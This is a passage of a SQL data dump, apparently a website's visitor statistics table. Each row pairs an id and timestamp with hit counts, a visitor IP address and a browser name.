659219,1,1,0,0,'157.55.39.159','other'),(496629,1586659485,2,2,0,0,'157.55.39.168','other'),(496630,1586660629,1,1,0,0,'157.55.39.159','other'),(496631,1586660754,1,1,0,0,'157.55.39.206','other'),(496632,1586660816,1,1,0,0,'213.180.203.16','other'),(496633,1586660876,1,1,0,0,'8.29.198.25','other'),(496634,1586660944,3,3,0,0,'178.154.200.222','other'),(496635,1586661250,1,1,0,0,'89.163.242.241','opera'),(496636,1586661288,1,1,0,0,'66.249.64.24','chrome'),(496637,1586661462,1,1,0,0,'8.29.198.27','other'),(496638,1586662164,3,3,0,0,'104.155.155.82','chrome'),(496639,1586662198,3,3,0,0,'34.68.219.253','chrome'),(496640,1586662212,3,3,0,0,'104.154.38.92','chrome'),(496641,1586662222,3,3,0,0,'35.239.18.82','chrome'),(496642,1586662231,4,4,0,0,'35.222.180.238','chrome'),(496644,1586662385,4,4,0,0,'178.154.200.222','other'),(496645,1586663103,1,1,0,0,'157.55.39.12','other'),(496646,1586663335,1,1,0,0,'178.154.200.222','other'),(496647,1586664353,1,1,0,0,'66.249.70.38','chrome'),(496648,1586664484,3,3,0,0,'178.154.200.222','other'),(496649,1586664661,1,1,0,0,'157.55.39.159','other'),(496650,1586665417,1,1,0,0,'178.154.200.222','other'),(496651,1586666204,1,1,0,0,'91.196.178.21','chrome'),(496652,1586666600,1,1,0,0,'62.205.134.182','other'),(496653,1586666662,1,1,0,0,'213.180.203.142','other'),(496654,1586666665,1,1,0,0,'178.154.200.155','other'),(496655,1586666714,1,1,0,0,'178.154.200.87','other'),(496656,1586666905,1,1,0,0,'157.55.39.159','other'),(496657,1586667388,1,1,0,0,'213.180.203.16','other'),(496658,1586667579,1,1,0,0,'178.154.200.222','other'),(496659,1586669046,1,1,0,0,'157.55.39.159','other'),(496660,1586669495,1,1,0,0,'157.55.39.12','other'),(496661,1586669829,1,1,0,0,'178.154.200.196','other'),(496662,1586669889,1,1,0,0,'159.203.93.122','msie'),(496663,1586670360,2,2,0,0,'157.55.39.159','other'),(496664,1586671075,1,0,1,0,'157.55.39.12',''),(496665,1586671204,1,1,0,0,'213.180.203.190','other'),(496666,1586671245,1,1,0,0,'176.36.88.53','chrome'),(496667,1586671493,1,1,0,0,'213.180.203.101','other'),(496668,1586671706,1,1,0,0,'8.29.198.27','other'),(496669,1586671797,2,2,0,0,'157.55.39.159','other'),(496670,1586671825,8,8,0,0,'77.120.98.235','other'),(496671,1586672097,1,1,0,0,'66.249.64.23','chrome'),(496672,1586672295,1,1,0,0,'8.29.198.26','other'),(496673,1586672325,1,1,0,0,'213.180.203.148','other'),(496674,1586672587,1,1,0,0,'213.180.203.140','other'),(496675,1586672765,1,1,0,0,'66.249.64.24','chrome'),(496676,1586672797,1,1,0,0,'31.13.127.3','other'),(496677,1586672798,1,1,0,0,'31.13.127.22','other'),(496678,1586672799,2,2,0,0,'31.13.127.7','other'),(496680,1586672808,1,1,0,0,'31.13.127.15','other'),(496682,1586672809,1,1,0,0,'31.13.127.14','other'),(496683,1586673603,1,1,0,0,'195.128.17.206','other'),(496684,1586673688,1,1,0,0,'157.55.39.12','other'),(496685,1586673793,2,2,0,0,'157.55.39.159','other'),(496686,1586674091,1,1,0,0,'213.180.203.95','other'),(496687,1586674108,1,1,0,0,'46.211.48.104','chrome'),(496688,1586674319,1,1,0,0,'66.249.64.23','chrome'),(496689,1586675194,1,1,0,0,'178.154.200.67','other'),(496690,1586675314,1,1,0,0,'213.180.203.148','other'),(496691,1586675346,1,1,0,0,'66.249.64.23','chrome'),(496692,1586675468,1,1,0,0,'178.154.200.87','other'),(496693,1586675786,1,1,0,0,'45.158.246.91','chrome'),(496694,1586675884,1,1,0,0,'213.180.203.189','other'),(496695,1586675892,2,2,0,0,'213.180.203.142','other'),(496696,1586676065,2,2,0,0,'207.46.13.242','other'),(496697,1586676128,1,1,0,0,'213.180.203.16','other'),(496698,1586677713,2,2,0,0,'157.55.39.159','other'),(496699,1586679292,1,1,0,0,'213.180.203.189','other'),(496700,1586679530,1,1,0,0,'91.196.178.117','chrome'),(496701,1586679972,1,1,0,0,'213.180.203.109','other'),(496702,1586680084,1,1,0,0,'66.249.64.25','chrome'),(496703,1586680176,2,2,0,0,'62.210.139.12','chrome'),(496704,1586680189,2,2,0,0,'195.154.222.29','chrome'),(496705,1586681235,1,1,0,0,'66.249.70.36','chrome'),(496706,1586682376,1,1,0,0,'178.154.200.155','other'),(496707,1586682536,2,2,0,0,'8.29.198.25','other'),(496708,1586683386,1,1,0,0,'207.46.13.242','other'),(496709,1586683750,1,1,0,0,'157.55.39.159','other'),(496710,1586683879,1,1,0,0,'213.180.203.17','other'),(496711,1586684251,1,1,0,0,'178.154.200.106','other'),(496712,1586684992,1,1,0,0,'178.154.200.97','other'),(496713,1586685039,1,1,0,0,'178.154.200.92','other'),(496714,1586685510,1,1,0,0,'207.46.13.242','other'),(496715,1586685515,1,1,0,0,'157.55.39.168','other'),(496716,1586685582,2,2,0,0,'157.55.39.159','other'),(496717,1586686025,1,0,1,0,'66.249.64.23',''),(496718,1586686298,1,1,0,0,'173.252.111.10','other'),(496719,1586686299,1,1,0,0,'173.252.111.2','other'),(496721,1586686389,8,8,0,0,'77.120.98.235','other'),(496722,1586686531,1,1,0,0,'178.154.200.216','other'),(496723,1586686923,1,1,0,0,'213.180.203.95','other'),(496724,1586686951,2,2,0,0,'66.249.64.25','chrome'),(496725,1586687520,1,1,0,0,'37.115.196.177','chrome'),(496726,1586687569,1,1,0,0,'207.46.13.242','other'),(496727,1586687671,1,1,0,0,'91.196.178.77','chrome'),(496728,1586688018,1,1,0,0,'178.154.200.106','other'),(496729,1586688162,1,1,0,0,'157.55.39.159','other'),(496730,1586688794,2,1,1,0,'66.249.64.24',''),(496731,1586689165,1,1,0,0,'207.46.13.242','other'),(496732,1586689384,1,1,0,0,'213.180.203.101','other'),(496733,1586689627,1,1,0,0,'157.55.39.168','other'),(496734,1586689674,1,1,0,0,'66.249.70.33','chrome'),(496735,1586689759,1,1,0,0,'157.55.39.159','other'),(496736,1586689788,1,1,0,0,'37.115.196.177','chrome'),(496737,1586690028,1,1,0,0,'178.154.200.19','other'),(496738,1586690834,2,2,0,0,'66.249.64.25','chrome'),(496739,1586690940,2,2,0,0,'157.55.39.159','other'),(496740,1586691052,1,1,0,0,'178.154.200.19','other'),(496741,1586691552,2,2,0,0,'178.154.200.155','other'),(496742,1586691571,1,1,0,0,'66.249.64.24','chrome'),(496743,1586691681,1,1,0,0,'91.196.178.114','chrome'),(496744,1586692149,1,1,0,0,'213.180.203.95','other'),(496745,1586692157,1,1,0,0,'82.145.211.36','other'),(496746,1586692697,2,2,0,0,'66.249.64.24','chrome'),(496747,1586692866,1,1,0,0,'157.55.39.206','other'),(496748,1586693039,1,1,0,0,'109.74.154.72','chrome'),(496749,1586693062,1,1,0,0,'157.55.39.159','other'),(496750,1586693335,1,1,0,0,'178.154.200.97','other'),(496751,1586693366,1,1,0,0,'8.29.198.26','other'),(496752,1586693398,1,1,0,0,'173.252.111.11','other'),(496753,1586693931,1,1,0,0,'66.249.64.23','chrome'),(496754,1586693951,1,1,0,0,'8.29.198.25','other'),(496755,1586694359,1,1,0,0,'17.58.101.25','other'),(496756,1586694371,2,2,0,0,'207.46.13.242','other'),(496757,1586694422,1,1,0,0,'131.220.6.152','chrome'),(496758,1586694556,1,1,0,0,'213.180.203.101','other'),(496759,1586694950,2,2,0,0,'178.154.200.222','other'),(496760,1586695018,1,1,0,0,'213.180.203.122','other'),(496761,1586695313,2,2,0,0,'157.55.39.159','other'),(496762,1586695380,1,1,0,0,'207.46.13.242','other'),(496763,1586695618,1,1,0,0,'66.249.64.23','chrome'),(496764,1586696480,1,1,0,0,'157.55.39.168','other'),(496765,1586696724,1,1,0,0,'37.73.138.121','chrome'),(496766,1586697259,2,2,0,0,'66.249.64.24','chrome'),(496767,1586697505,1,1,0,0,'157.55.39.159','other'),(496768,1586698128,1,1,0,0,'91.196.178.174','chrome'),(496769,1586698210,1,1,0,0,'91.196.178.178','chrome'),(496770,1586698237,1,1,0,0,'91.196.178.152','chrome'),(496771,1586699704,1,1,0,0,'91.196.178.174','chrome'),(496772,1586700140,1,1,0,0,'66.249.64.25','chrome'),(496773,1586700152,2,2,0,0,'157.55.39.206','other'),(496774,1586700190,1,1,0,0,'5.105.39.88','firefox'),(496775,1586700372,1,1,0,0,'66.249.70.38','chrome'),(496776,1586700663,2,2,0,0,'157.55.39.168','other'),(496777,1586701543,2,2,0,0,'66.249.64.25','chrome'),(496778,1586701581,1,1,0,0,'91.196.177.61','chrome'),(496779,1586701584,1,1,0,0,'193.106.30.99','firefox'),(496780,1586701791,1,1,0,0,'66.249.70.38','chrome'),(496781,1586701934,3,3,0,0,'157.55.39.168','other'),(496782,1586702147,1,1,0,0,'157.55.39.159','other'),(496783,1586702534,1,1,0,0,'91.196.178.78','firefox'),(496784,1586702559,1,1,0,0,'178.154.200.19','other'),(496785,1586702639,8,8,0,0,'77.120.98.235','other'),(496786,1586703132,1,1,0,0,'31.13.127.1','other'),(496787,1586704197,1,1,0,0,'8.29.198.25','other'),(496788,1586704289,1,1,0,0,'207.46.13.242','other'),(496789,1586704569,2,2,0,0,'66.249.64.25','chrome'),(496790,1586704770,1,1,0,0,'66.249.64.23','chrome'),(496791,1586704784,1,1,0,0,'8.29.198.27','other'),(496792,1586705135,1,1,0,0,'178.154.200.119','other'),(496793,1586705685,1,1,0,0,'157.55.39.206','other'),(496794,1586707048,1,1,0,0,'157.55.39.168','other'),(496795,1586707671,1,1,0,0,'66.249.64.24','chrome'),(496796,1586708578,1,0,1,0,'66.249.64.25',''),(496797,1586708737,1,1,0,0,'157.55.39.206','other'),(496798,1586709012,1,1,0,0,'207.46.13.242','other'),(496799,1586709091,1,1,0,0,'66.249.70.38','chrome'),(496800,1586709119,2,2,0,0,'66.249.64.25','chrome'),(496801,1586709307,1,1,0,0,'157.55.39.168','other'),(496802,1586710052,1,1,0,0,'37.54.114.236','chrome'),(496803,1586710324,1,1,0,0,'35.233.53.147','chrome'),(496804,1586711079,1,1,0,0,'173.252.111.13','other'),(496805,1586711080,1,1,0,0,'173.252.111.16','other'),(496806,1586711102,1,1,0,0,'173.252.111.21','other'),(496807,1586711103,2,2,0,0,'207.46.13.242','other'),(496808,1586711151,1,1,0,0,'157.55.39.206','other'),(496809,1586711228,1,1,0,0,'95.216.15.49','other'),(496810,1586711281,1,1,0,0,'46.211.150.96','other'),(496811,1586711443,1,1,0,0,'213.180.203.109','other'),(496812,1586712231,2,2,0,0,'157.55.39.159','other'),(496813,1586712656,1,1,0,0,'66.249.70.38','chrome'),(496814,1586713522,1,1,0,0,'157.55.39.206','other'),(496815,1586713867,1,1,0,0,'66.249.64.25','chrome'),(496816,1586713907,2,2,0,0,'207.46.13.242','other'),(496817,1586714082,2,2,0,0,'88.99.2.203','other'),(496818,1586714265,1,1,0,0,'157.55.39.159','other'),(496819,1586714432,2,2,0,0,'51.68.152.26','chrome'),(496820,1586714835,2,2,0,0,'157.55.39.168','other'),(496821,1586715019,1,1,0,0,'8.29.198.26','other'),(496822,1586715480,1,1,0,0,'2.47.39.220','other'),(496823,1586715545,1,1,0,0,'88.99.2.203','other'),(496824,1586715612,1,1,0,0,'8.29.198.25','other'),(496825,1586715832,1,1,0,0,'157.55.39.159','other'),(496826,1586715938,1,1,0,0,'157.55.39.168','other'),(496827,1586716105,1,1,0,0,'157.55.39.206','other'),(496828,1586716331,1,1,0,0,'66.249.64.25','chrome'),(496829,1586716464,1,1,0,0,'88.99.2.203','other'),(496830,1586716892,2,2,0,0,'173.252.111.18','other'),(496831,1586717033,1,1,0,0,'173.252.111.22','other'),(496833,1586717046,1,1,0,0,'173.252.111.4','other'),(496835,1586717047,1,1,0,0,'173.252.111.8','other'),(496836,1586717546,1,1,0,0,'88.99.2.203','other'),(496837,1586717782,1,1,0,0,'207.46.13.242','other'),(496838,1586717861,1,1,0,0,'157.55.39.168','other'),(496839,1586718465,8,8,0,0,'77.120.98.235','other'),(496840,1586718699,1,1,0,0,'88.99.2.203','other'),(496841,1586718722,2,2,0,0,'157.55.39.159','other'),(496842,1586718804,1,1,0,0,'46.211.246.143','chrome'),(496843,1586718874,1,1,0,0,'178.154.200.176','other'),(496844,1586719468,1,1,0,0,'66.249.64.24','chrome'),(496845,1586719830,1,1,0,0,'88.99.2.203','other'),(496846,1586720037,2,1,1,0,'157.55.39.206',''),(496847,1586720056,1,1,0,0,'66.249.64.23','chrome'),(496848,1586720124,1,1,0,0,'157.55.39.159','other'),(496849,1586720266,1,1,0,0,'157.55.39.206','other'),(496850,1586720480,1,1,0,0,'66.249.64.24','chrome'),(496851,1586722208,1,0,1,0,'157.55.39.206',''),(496852,1586722688,1,1,0,0,'207.46.13.242','other'),(496853,1586723401,1,1,0,0,'66.249.64.25','chrome'),(496854,1586725851,1,1,0,0,'8.29.198.25','other'),(496855,1586726438,1,1,0,0,'8.29.198.26','other'),(496856,1586726635,2,2,0,0,'157.55.39.248','other'),(496857,1586726977,1,1,0,0,'213.180.203.122','other'),(496858,1586727227,1,1,0,0,'66.249.64.24','chrome'),(496859,1586728144,1,1,0,0,'157.55.39.206','other'),(496860,1586728999,1,1,0,0,'93.73.199.52','chrome'),(496861,1586729275,1,1,0,0,'66.249.64.24','chrome'),(496862,1586729996,2,2,0,0,'207.46.13.242','other'),(496863,1586730750,1,0,1,0,'66.249.64.24',''),(496864,1586731955,1,1,0,0,'213.180.203.70','other'),(496865,1586732102,2,2,0,0,'207.46.13.242','other'),(496866,1586732128,1,0,1,0,'157.55.39.206',''),(496867,1586732345,1,1,0,0,'157.55.39.206','other'),(496868,1586732841,1,1,0,0,'157.55.39.248','other'),(496869,1586733594,8,8,0,0,'77.120.98.235','other'),(496870,1586733680,1,1,0,0,'66.249.64.24','chrome'),(496871,1586734565,1,1,0,0,'207.46.13.242','other'),(496872,1586734884,1,1,0,0,'154.51.131.142','chrome'),(496873,1586735709,1,1,0,0,'62.205.134.182','other'),(496874,1586735719,1,1,0,0,'66.249.64.24','chrome'),(496875,1586736048,1,1,0,0,'157.55.39.206','other'),(496876,1586736412,1,1,0,0,'207.46.13.242','other'),(496877,1586736489,1,1,0,0,'66.249.64.23','chrome'),(496878,1586736684,2,2,0,0,'8.29.198.26','other'),(496879,1586738567,1,1,0,0,'66.249.64.24','chrome'),(496880,1586739433,2,2,0,0,'198.108.66.240','other'),(496881,1586740253,1,1,0,0,'157.55.39.206','other'),(496882,1586740522,2,2,0,0,'198.108.66.240','other'),(496883,1586740996,1,1,0,0,'157.55.39.248','other'),(496884,1586741507,1,1,0,0,'66.249.64.24','chrome'),(496885,1586742918,2,2,0,0,'66.249.64.23','chrome'),(496886,1586743375,1,1,0,0,'66.249.70.38','chrome'),(496887,1586743545,1,1,0,0,'66.249.64.25','chrome'),(496888,1586743860,2,2,0,0,'66.249.64.23','chrome'),(496889,1586743981,1,1,0,0,'178.154.200.112','other'),(496890,1586744871,1,1,0,0,'66.249.64.25','chrome'),(496891,1586745219,1,1,0,0,'178.154.200.155','other'),(496892,1586745227,1,0,1,0,'66.249.64.24',''),(496893,1586745431,1,1,0,0,'157.55.39.248','other'),(496894,1586745734,2,2,0,0,'207.46.13.242','other'),(496895,1586746441,1,1,0,0,'213.180.203.70','other'),(496896,1586746496,2,2,0,0,'66.249.64.25','chrome'),(496897,1586747224,1,1,0,0,'178.154.200.196','other'),(496898,1586747395,1,1,0,0,'207.46.13.242','other'),(496899,1586747515,1,1,0,0,'8.29.198.25','other'),(496900,1586747539,2,1,1,0,'157.55.39.248',''),(496901,1586747564,1,1,0,0,'188.166.16.36','chrome'),(496902,1586748094,1,1,0,0,'8.29.198.27','other'),(496903,1586748621,1,1,0,0,'157.55.39.248','other'),(496904,1586748685,1,1,0,0,'176.103.56.200','chrome'),(496905,1586749005,2,2,0,0,'66.249.64.24','chrome'),(496906,1586749114,1,1,0,0,'31.13.115.9','other'),(496907,1586749118,2,2,0,0,'31.13.115.8','other'),(496908,1586749120,1,1,0,0,'31.13.115.14','other'),(496909,1586749149,2,2,0,0,'31.13.115.7','other'),(496910,1586749304,2,2,0,0,'207.46.13.242','other'),(496911,1586749670,8,8,0,0,'77.120.98.235','other'),(496912,1586749866,1,1,0,0,'66.249.64.25','chrome'),(496913,1586749903,1,1,0,0,'66.249.64.23','chrome'),(496914,1586751834,1,1,0,0,'178.154.200.119','other'),(496915,1586752325,1,1,0,0,'213.180.203.17','other'),(496916,1586752648,1,1,0,0,'157.55.39.248','other'),(496917,1586752741,1,1,0,0,'66.249.64.25','chrome'),(496918,1586752988,1,1,0,0,'62.205.134.182','other'),(496919,1586753043,1,1,0,0,'31.13.103.15','other'),(496920,1586753045,1,1,0,0,'31.13.103.21','other'),(496921,1586753558,1,1,0,0,'193.106.30.99','chrome'),(496922,1586753725,1,1,0,0,'92.38.136.69','chrome'),(496923,1586753739,1,1,0,0,'66.249.64.23','chrome'),(496924,1586754269,1,1,0,0,'207.46.13.242','other'),(496925,1586754293,1,0,1,0,'157.55.39.248',''),(496926,1586754689,1,1,0,0,'157.55.39.248','other'),(496927,1586755183,1,0,1,0,'207.46.13.34',''),(496928,1586755208,1,1,0,0,'207.46.13.34','other'),(496929,1586755525,1,1,0,0,'185.183.96.122','firefox'),(496930,1586756113,2,2,0,0,'91.196.178.76','firefox'),(496931,1586757193,1,1,0,0,'31.13.103.2','other'),(496932,1586757194,1,1,0,0,'31.13.103.24','other'),(496933,1586757725,1,1,0,0,'81.133.241.97','other'),(496934,1586757945,1,1,0,0,'66.249.64.23','chrome'),(496935,1586758352,1,1,0,0,'8.29.198.27','other'),(496936,1586758716,1,1,0,0,'66.249.64.24','chrome'),(496937,1586758917,1,1,0,0,'8.29.198.25','other'),(496938,1586759889,1,0,1,0,'66.249.64.24',''),(496939,1586759963,1,1,0,0,'66.249.64.25','chrome'),(496940,1586760773,1,1,0,0,'91.196.178.68','chrome'),(496941,1586761045,1,1,0,0,'66.249.64.25','chrome'),(496942,1586761184,1,1,0,0,'207.46.13.34','other'),(496943,1586761852,1,1,0,0,'66.249.64.24','chrome'),(496944,1586762279,1,1,0,0,'66.249.70.36','chrome'),(496945,1586762891,1,1,0,0,'31.13.127.1','other'),(496946,1586762892,1,1,0,0,'31.13.127.4','other'),(496948,1586763020,1,1,0,0,'91.196.178.180','chrome'),(496949,1586763191,1,1,0,0,'66.249.64.23','chrome'),(496950,1586763876,1,1,0,0,'66.249.70.38','chrome'),(496951,1586764431,1,1,0,0,'157.55.39.248','other'),(496952,1586764533,1,1,0,0,'207.46.13.242','other'),(496953,1586765017,1,1,0,0,'66.249.64.24','chrome'),(496954,1586765392,1,1,0,0,'66.249.70.36','chrome'),(496955,1586766672,1,1,0,0,'194.44.253.141','chrome'),(496956,1586766853,1,1,0,0,'176.122.93.96','chrome'),(496957,1586767049,1,1,0,0,'178.154.200.112','other'),(496958,1586768239,1,1,0,0,'35.230.49.100','firefox'),(496959,1586768288,8,8,0,0,'77.120.98.235','other'),(496960,1586768346,1,1,0,0,'66.249.64.24','chrome'),(496961,1586768627,1,1,0,0,'66.249.64.25','chrome'),(496962,1586769056,1,1,0,0,'157.55.39.206','other'),(496963,1586769183,1,1,0,0,'8.29.198.25','other'),(496964,1586769260,2,2,0,0,'192.3.31.39','chrome'),(496965,1586769296,1,1,0,0,'176.36.239.137','other'),(496966,1586769306,1,1,0,0,'178.154.200.220','other'),(496967,1586769741,1,1,0,0,'8.29.198.26','other'),(496968,1586769903,1,1,0,0,'157.55.39.248','other'),(496969,1586769930,1,1,0,0,'66.249.64.25','chrome'),(496970,1586770609,1,1,0,0,'157.55.39.206','other'),(496971,1586770705,1,1,0,0,'178.154.200.175','other'),(496972,1586770915,1,1,0,0,'93.73.160.193','firefox'),(496973,1586771823,1,1,0,0,'91.196.178.171','chrome'),(496974,1586772045,1,1,0,0,'18.219.220.72','chrome'),(496975,1586772383,1,1,0,0,'91.196.177.46','chrome'),(496976,1586773500,1,1,0,0,'39.104.156.79','firefox'),(496977,1586773727,1,1,0,0,'94.153.8.222','chrome'),(496978,1586773774,1,1,0,0,'66.249.64.23','chrome'),(496979,1586773974,1,1,0,0,'66.249.64.25','chrome'),(496980,1586774239,3,3,0,0,'207.46.13.242','other'),(496981,1586774395,1,1,0,0,'178.154.200.87','other'),(496982,1586775572,1,1,0,0,'207.46.13.34','other'),(496983,1586775954,1,1,0,0,'178.154.200.176','other'),(496984,1586775984,1,1,0,0,'178.154.200.216','other'),(496985,1586776093,3,3,0,0,'46.219.206.225','chrome'),(496986,1586776365,1,1,0,0,'157.55.39.248','other'),(496987,1586776912,2,2,0,0,'66.249.64.25','chrome'),(496988,1586777397,1,0,1,0,'207.46.13.242',''),(496989,1586777422,1,1,0,0,'91.196.178.68','chrome'),(496990,1586777424,1,1,0,0,'66.249.64.23','chrome'),(496991,1586777940,1,1,0,0,'66.249.64.25','chrome'),(496992,1586777949,1,1,0,0,'157.55.39.248','other'),(496993,1586778121,1,1,0,0,'46.4.33.48','other'),(496994,1586778151,1,1,0,0,'66.249.70.33','chrome'),(496995,1586778318,1,1,0,0,'128.71.41.211','chrome'),(496996,1586778734,1,1,0,0,'66.249.64.23','chrome'),(496997,1586778914,1,1,0,0,'91.196.178.76','chrome'),(496998,1586778917,1,1,0,0,'157.55.39.248','other'),(496999,1586778959,1,1,0,0,'157.55.39.206','other'),(497000,1586778978,1,1,0,0,'91.196.178.89','chrome'),(497001,1586779092,1,1,0,0,'109.74.154.72','chrome'),(497002,1586779285,1,1,0,0,'66.249.64.24','chrome'),(497003,1586779286,1,1,0,0,'66.249.70.36','chrome'),(497004,1586779520,1,1,0,0,'92.112.124.214','chrome'),(497005,1586779949,1,1,0,0,'157.55.39.248','other'),(497006,1586780017,1,1,0,0,'8.29.198.26','other'),(497007,1586780023,1,1,0,0,'94.231.176.14','other'),(497008,1586780208,1,1,0,0,'207.46.13.34','other'),(497009,1586780294,1,1,0,0,'198.108.66.192','other'),(497010,1586780567,1,1,0,0,'8.29.198.25','other'),(497011,1586780946,1,1,0,0,'66.249.64.24','chrome'),(497012,1586781174,1,1,0,0,'66.249.64.23','chrome'),(497013,1586781364,1,1,0,0,'91.196.178.89','chrome'),(497014,1586781449,1,1,0,0,'207.46.13.34','other'),(497015,1586781534,1,1,0,0,'131.220.6.152','chrome'),(497016,1586781676,2,2,0,0,'157.55.39.248','other'),(497017,1586781741,1,1,0,0,'178.154.200.22','other'),(497018,1586782196,1,1,0,0,'91.196.178.76','chrome'),(497019,1586782339,1,1,0,0,'94.179.208.161','chrome'),(497020,1586782637,1,1,0,0,'207.46.13.34','other'),(497021,1586782774,1,1,0,0,'91.209.11.236','other'),(497022,1586783308,1,1,0,0,'213.180.203.81','other'),(497023,1586783322,1,1,0,0,'213.180.203.16','other'),(497024,1586783400,1,1,0,0,'66.249.64.24','chrome'),(497025,1586783446,2,2,0,0,'157.55.39.248','other'),(497026,1586783784,1,1,0,0,'94.179.208.161','chrome'),(497027,1586783832,1,1,0,0,'109.86.30.166','chrome'),(497028,1586784177,1,1,0,0,'91.196.178.131','chrome'),(497029,1586784773,1,1,0,0,'178.154.200.155','other'),(497030,1586784861,1,1,0,0,'207.46.13.34','other'),(497031,1586784877,1,1,0,0,'213.180.203.17','other'),(497032,1586785830,1,1,0,0,'178.154.200.236','other'),(497033,1586785904,3,3,0,0,'66.249.64.23','chrome'),(497034,1586786189,1,1,0,0,'66.249.64.24','chrome'),(497035,1586786640,8,8,0,0,'77.120.98.235','other'),(497036,1586786970,1,1,0,0,'176.36.41.247','chrome'),(497037,1586787012,1,1,0,0,'157.55.39.248','other'),(497038,1586787072,1,1,0,0,'213.180.203.140','other'),(497039,1586787458,1,1,0,0,'66.249.64.23','chrome'),(497040,1586787719,1,1,0,0,'66.249.64.25','chrome'),(497041,1586788301,2,1,1,0,'207.46.13.242',''),(497042,1586788525,1,0,1,0,'157.55.39.248',''),(497043,1586788786,1,1,0,0,'178.154.200.175','other'),(497044,1586788923,1,1,0,0,'213.180.203.70','other'),(497045,1586789007,1,1,0,0,'157.55.39.206','other'),(497046,1586789615,2,2,0,0,'66.249.64.23','chrome'),(497047,1586789698,1,1,0,0,'213.180.203.122','other'),(497048,1586789831,1,1,0,0,'198.108.66.176','other'),(497049,1586789944,1,1,0,0,'157.55.39.248','other'),(497050,1586790335,1,1,0,0,'178.154.200.220','other'),(497051,1586790344,2,2,0,0,'66.249.64.24','chrome'),(497052,1586790852,1,1,0,0,'8.29.198.26','other'),(497053,1586791046,2,2,0,0,'207.46.13.242','other'),(497054,1586791213,1,1,0,0,'157.55.39.206','other'),(497055,1586791393,1,1,0,0,'8.29.198.27','other'),(497056,1586791409,1,1,0,0,'66.249.70.36','chrome'),(497057,1586791415,1,1,0,0,'157.55.39.248','other'),(497058,1586791511,1,1,0,0,'66.249.64.24','chrome'),(497059,1586792428,1,1,0,0,'91.196.178.164','chrome'),(497060,1586792471,1,1,0,0,'66.249.64.23','chrome'),(497061,1586792616,1,1,0,0,'157.55.39.248','other'),(497062,1586792816,1,0,1,0,'66.249.64.24',''),(497063,1586793829,1,1,0,0,'157.55.39.248','other'),(497064,1586794682,1,1,0,0,'66.249.64.24','chrome'),(497065,1586794916,1,0,1,0,'157.55.39.248',''),(497066,1586795016,2,2,0,0,'157.55.39.248','other'),(497067,1586795162,1,1,0,0,'188.115.131.142','chrome'),(497068,1586795384,1,1,0,0,'91.196.178.28','chrome'),(497069,1586795567,1,1,0,0,'178.154.200.222','other'),(497070,1586796496,1,1,0,0,'157.55.39.248','other'),(497071,1586796569,1,1,0,0,'91.196.178.28','chrome'),(497072,1586796604,1,1,0,0,'213.180.203.16','other'),(497073,1586797184,1,1,0,0,'66.249.64.24','chrome'),(497074,1586797189,1,1,0,0,'193.106.30.99','firefox'),(497075,1586797433,1,1,0,0,'173.252.111.3','other'),(497076,1586797436,1,1,0,0,'173.252.111.13','other'),(497077,1586797441,1,1,0,0,'173.252.111.22','other'),(497078,1586797442,1,1,0,0,'173.252.83.17','other'),(497079,1586797445,1,1,0,0,'173.252.127.49','other'),(497080,1586797495,1,1,0,0,'173.252.111.6','other'),(497081,1586797496,2,2,0,0,'173.252.111.23','other'),(497084,1586797500,1,1,0,0,'173.252.111.2','other'),(497085,1586797537,1,1,0,0,'31.13.127.5','other'),(497086,1586797551,1,1,0,0,'46.211.220.57','chrome'),(497087,1586797661,1,1,0,0,'46.211.13.232','chrome'),(497088,1586797663,1,1,0,0,'91.196.178.22','chrome'),(497089,1586797688,1,1,0,0,'91.196.178.34','chrome'),(497090,1586797716,1,1,0,0,'46.211.66.143','other'),(497091,1586797794,1,1,0,0,'188.163.19.121','other'),(497092,1586797833,1,1,0,0,'91.196.178.88','chrome'),(497093,1586797880,1,1,0,0,'91.196.178.178','chrome'),(497094,1586797893,1,1,0,0,'91.196.178.28','chrome'),(497095,1586798200,1,1,0,0,'178.251.109.245','chrome'),(497096,1586798242,1,1,0,0,'91.196.178.177','chrome'),(497097,1586798319,1,1,0,0,'66.249.64.25','chrome'),(497098,1586798320,1,1,0,0,'77.222.145.82','chrome'),(497099,1586798361,1,1,0,0,'91.196.178.27','chrome'),(497100,1586798367,1,1,0,0,'91.196.178.136','chrome'),(497101,1586798443,1,1,0,0,'91.196.178.26','chrome'),(497102,1586798462,2,2,0,0,'91.196.178.61','chrome'),(497103,1586798521,1,1,0,0,'91.196.178.41','chrome'),(497104,1586798587,1,1,0,0,'91.196.178.147','chrome'),(497105,1586798609,1,1,0,0,'213.111.73.20','chrome'),(497106,1586798665,1,1,0,0,'157.55.39.248','other'),(497107,1586798879,1,1,0,0,'157.55.39.206','other'),(497108,1586798881,1,1,0,0,'194.247.173.223','chrome'),(497109,1586798935,1,1,0,0,'91.196.178.72','chrome'),(497110,1586798944,1,1,0,0,'185.11.29.179','chrome'),(497111,1586798994,1,1,0,0,'91.196.178.138','other'),(497112,1586799026,1,1,0,0,'207.46.13.34','other'),(497113,1586799030,1,1,0,0,'91.124.83.93','chrome'),(497114,1586799039,1,1,0,0,'91.196.178.165','chrome'),(497115,1586799043,1,1,0,0,'178.133.149.227','chrome'),(497116,1586799209,1,1,0,0,'95.132.8.53','chrome'),(497117,1586799260,1,1,0,0,'91.196.178.54','chrome'),(497118,1586799273,1,1,0,0,'167.114.172.167','firefox'),(497119,1586799277,1,1,0,0,'94.153.10.29','chrome'),(497120,1586799283,1,1,0,0,'91.196.178.112','chrome'),(497121,1586799305,1,1,0,0,'91.196.178.169','chrome'),(497122,1586799456,1,1,0,0,'178.92.73.235','chrome'),(497123,1586799617,1,1,0,0,'46.211.15.151','other'),(497124,1586799671,1,1,0,0,'91.196.178.179','chrome'),(497125,1586799681,1,1,0,0,'37.55.56.113','chrome'),(497126,1586799797,1,1,0,0,'91.196.178.76','chrome'),(497127,1586799847,1,1,0,0,'88.155.104.70','chrome'),(497128,1586799849,1,1,0,0,'178.92.250.173','chrome'),(497129,1586799930,1,1,0,0,'128.124.70.5','chrome'),(497130,1586800099,1,1,0,0,'91.196.178.189','chrome'),(497131,1586800112,1,1,0,0,'91.196.178.103','chrome'),(497132,1586800135,1,1,0,0,'66.249.64.24','chrome'),(497133,1586800219,1,1,0,0,'31.172.136.186','chrome'),(497134,1586800329,1,1,0,0,'91.196.178.155','chrome'),(497135,1586800427,1,1,0,0,'178.133.148.125','chrome'),(497136,1586800445,1,1,0,0,'91.196.178.47','chrome'),(497137,1586800476,1,1,0,0,'91.196.178.171','chrome'),(497138,1586800615,1,1,0,0,'94.179.246.196','chrome'),(497139,1586800660,1,1,0,0,'91.196.178.68','chrome'),(497140,1586800782,2,2,0,0,'176.37.46.221','c